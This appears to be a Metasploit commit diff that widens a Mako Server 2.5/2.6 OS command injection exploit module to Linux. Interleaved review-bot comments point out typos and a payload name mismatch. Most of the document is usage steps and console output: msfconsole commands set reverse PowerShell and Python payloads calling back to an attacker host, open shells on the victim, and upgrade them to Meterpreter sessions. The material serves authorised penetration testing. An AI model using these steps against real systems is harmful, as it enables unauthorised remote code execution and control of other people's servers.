Land #9197, Cleanup Mako Server exploit

MS-2855/keylogger-mettle-extension 4.16.17
Adam Cammack 2017-11-15 15:01:31 -06:00
commit c740f4369c
No known key found for this signature in database
GPG Key ID: C9378BA088092D66
2 changed files with 108 additions and 20 deletions

View File

@ -1,6 +1,6 @@
## Description ## Description
This module exploits a vulnerability found in Mako Server v2.5. This module exploits a vulnerability found in Mako Server v2.5, 2.6.
It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp. It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp.
Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391 Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391
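Review bot: "victims machine" in the updated Description should be "victim's machine" (possessive); the same sentence is duplicated verbatim in the module's own 'Description' block, so the typo should be fixed in both places in one go. While touching the sentence, "Mako Server v2.5, 2.6" reads more naturally as "Mako Server versions 2.5 and 2.6".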
@ -9,33 +9,48 @@
[Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications. [Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications.
This module has been verified against the following Mako Server versions for Windows XP SP3 and Windows 7 SP1 (x86/x64): This module has been verified against the following Mako Server versions for Windows XP SP3, Windows 7 SP1 and Linux Ubuntu 16.04 LTS:
- v2.5 - v2.5
- v2.6
Links: Links:
- [Windows installer](https://makoserver.net/download/mako.windows.x86.exe) - [Windows x86 installer](https://makoserver.net/download/mako.windows.x86.exe)
- [Windows download page](https://makoserver.net/download/windows) - [Windows download page](https://makoserver.net/download/windows)
- [Documentation](https://makoserver.net/documentation/manual/) - [Linux x64 installer](https://makoserver.net/download/mako.linux-x64.tar.gz)
- [Linux download page](https://makoserver.net/download/linux-x86)
- [Documentation](https://makoserver.net/download/manual)
## References for vulnerability ## References for vulnerability
- https://blogs.securiteam.com/index.php/archives/3391 - https://blogs.securiteam.com/index.php/archives/3391
- https://www.exploit-db.com/exploits/42683 - https://www.exploit-db.com/exploits/42683
## Verification Steps ## Verification Steps for Windows
1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work) 1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work)
2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop 2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop
3. Start msfconsole on host 4. Start msfconsole on host
4. Do: ```use exploit/windows/http/makoserver_cmd_exec``` 5. Do: ```use exploit/multi/http/makoserver_cmd_exec```
5. Do: ```set RHOST <IP address of target system>``` 6. Do: ```set RHOST <IP address of target system>```
6. Do: ```set PAYLOAD cmd/windows/reverse_powershell``` 7. Do: ```set PAYLOAD cmd/windows/reverse_powershell```
7. Do: ```set LHOST <IP address of host system>``` 8. Do: ```set LHOST <IP address of host system>```
8. Do: ```exploit``` 9. Do: ```exploit```
9. You should get a Windows command shell 10. You should get a Windows command shell
## Verification Steps for Linux
1. Extract the "mako.linux-x64.tar.gz" on a Linux Ubuntu 16.04 LTS (x64) target (with Python for this example to work)
2. From inside the extracted folder, do ```./rundemo.sh```
4. Start msfconsole on host
5. Do: ```use exploit/multi/http/makoserver_cmd_exec```
6. Do: ```set RHOST <IP address of target system>```
7. Do: ```set PAYLOAD cmd/unix/python_reverse```
8. Do: ```set LHOST <IP address of host system>```
9. Do: ```exploit```
10. You should get a Linux command shell (may need to wait ~30 seconds)
## Example Output ## Example Output
``` ```
msf > use exploit/windows/http/makoserver_cmd_exec msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3 RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
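Review bot: The Linux verification step "7. Do: ```set PAYLOAD cmd/unix/python_reverse```" names a payload that does not match the one used in this file's own Linux example output ("set PAYLOAD cmd/unix/reverse_python"); the step should read `set PAYLOAD cmd/unix/reverse_python` so the documented procedure works as typed. Both new step lists also skip number 3 (Windows: "2. After installer finishes ... 4. Start msfconsole"; Linux: "2. From inside the extracted folder ... 4. Start msfconsole"), so renumber them consecutively. Minor: "Powershell" should be spelled "PowerShell", and the Documentation link changed from `/documentation/manual/` to `/download/manual`, which is worth confirming resolves before merge.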
@ -57,7 +72,7 @@ C:\Users\Smith\Downloads\MakoServer>
## Example Verbose Output ## Example Verbose Output
``` ```
msf > use exploit/windows/http/makoserver_cmd_exec msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3 RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set VERBOSE true msf exploit(makoserver_cmd_exec) > set VERBOSE true
@ -94,7 +109,7 @@ C:\Users\Smith\Downloads\MakoServer>
A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session: A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session:
``` ```
msf > use exploit/windows/http/makoserver_cmd_exec msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2 msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
RHOST => 10.10.10.2 RHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
@ -161,3 +176,76 @@ C:\Users\Smith\Downloads\MakoServer>
Logged On Users : 2 Logged On Users : 2
Meterpreter : x86/windows Meterpreter : x86/windows
``` ```
### Targeting Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5
A typical scenario would be to obtain a Linux command shell and then upgrade to a Meterpreter session:
```
msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
RHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
LHOST => 10.10.10.4
msf exploit(makoserver_cmd_exec) > check
[*] 10.10.10.2:80 The target appears to be vulnerable.
msf exploit(makoserver_cmd_exec) > exploit
[*] Started reverse TCP handler on 10.10.10.4:4444
[*] Sending payload to target...
[*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:57888) at 2017-11-10 15:52:33 -0500
ls
LICENSE.txt
mako
mako.zip
README.txt
rundemo.sh
tutorial
^Z
Background session 1? [y/N] y
msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
msf post(shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf post(shell_to_meterpreter) > set LPORT 8080
LPORT => 8080
msf post(shell_to_meterpreter) > exploit
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.10.4:8080
[*] Sending stage (847604 bytes) to 10.10.10.2
[*] Meterpreter session 2 opened (10.10.10.4:8080 -> 10.10.10.2:60448) at 2017-11-10 15:54:38 -0500
[*] Command stager progress: 100.00% (736/736 bytes)
[*] Post module execution completed
msf post(shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
2 meterpreter x86/linux uid=1000, gid=1000, euid=1000, egid=1000 @ 10.10.10.2 10.10.10.4:8080 -> 10.10.10.2:60448 (10.10.10.2)
msf post(shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer : 10.10.10.2
OS : Ubuntu 16.04 (Linux 4.10.0-35-generic)
Architecture : x64
Meterpreter : x86/linux
```
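Review bot: The new heading "### Targeting Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5" pins the scenario to v2.5, while the verification steps above only say to extract "mako.linux-x64.tar.gz" and the verified-versions list claims both 2.5 and 2.6; either state which version the tarball was (and whether 2.6 was also exercised on Linux) or drop the version from the heading. This example's payload name `cmd/unix/reverse_python` is the right one and is what the Linux verification steps should use. It would also help readers to note in the prose that the upgraded session is a 32-bit Meterpreter on a 64-bit host, as the sysinfo output shows ("Architecture : x64" / "Meterpreter : x86/linux"), so nobody expects a native x64 session from shell_to_meterpreter here.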

View File

@ -4,15 +4,15 @@
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Mako Server v2.5 OS Command Injection RCE', 'Name' => 'Mako Server v2.5, 2.6 OS Command Injection RCE',
'Description' => %q{ 'Description' => %q{
This module exploits a vulnerability found in Mako Server v2.5. This module exploits a vulnerability found in Mako Server v2.5, 2.6.
It's possible to inject arbitrary OS commands in the Mako Server It's possible to inject arbitrary OS commands in the Mako Server
tutorial page through a PUT request to save.lsp. tutorial page through a PUT request to save.lsp.
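Review bot: The rank bump from `GoodRanking` to `ExcellentRanking` lands in a hunk whose other changes only widen the version range, and the commit title calls this a cleanup; please add a one-line justification in the PR (deterministic command injection via a PUT to save.lsp, no memory corruption, no service crash on failure) so the rank change is reviewable on its own. The 'Description' block carries the same "victims machine" typo as the markdown doc and should be corrected to "victim's machine" together with it.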
@ -31,10 +31,10 @@ class MetasploitModule < Msf::Exploit::Remote
['URL', 'https://blogs.securiteam.com/index.php/archives/3391'] ['URL', 'https://blogs.securiteam.com/index.php/archives/3391']
], ],
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Platform' => 'win', 'Platform' => %w[win unix],
'Targets' => 'Targets' =>
[ [
['Mako Server v2.5 - Windows x86/x64', { }] ['Mako Server v2.5, 2.6', {}]
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'Privileged' => false, 'Privileged' => false,
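Review bot: Collapsing the target list to a single `['Mako Server v2.5, 2.6', {}]` entry with `'Platform' => %w[win unix]` means the platform is now chosen entirely by the selected ARCH_CMD payload; the rest of the module (not shown in this hunk) should be checked so that nothing in the request-building path still assumes Windows command syntax for the injected command, and that `check` behaves the same on both platforms, since the docs show it returning "The target appears to be vulnerable." against the Linux target. `'Privileged' => false` is consistent with the documented uid=1000 session and can stay.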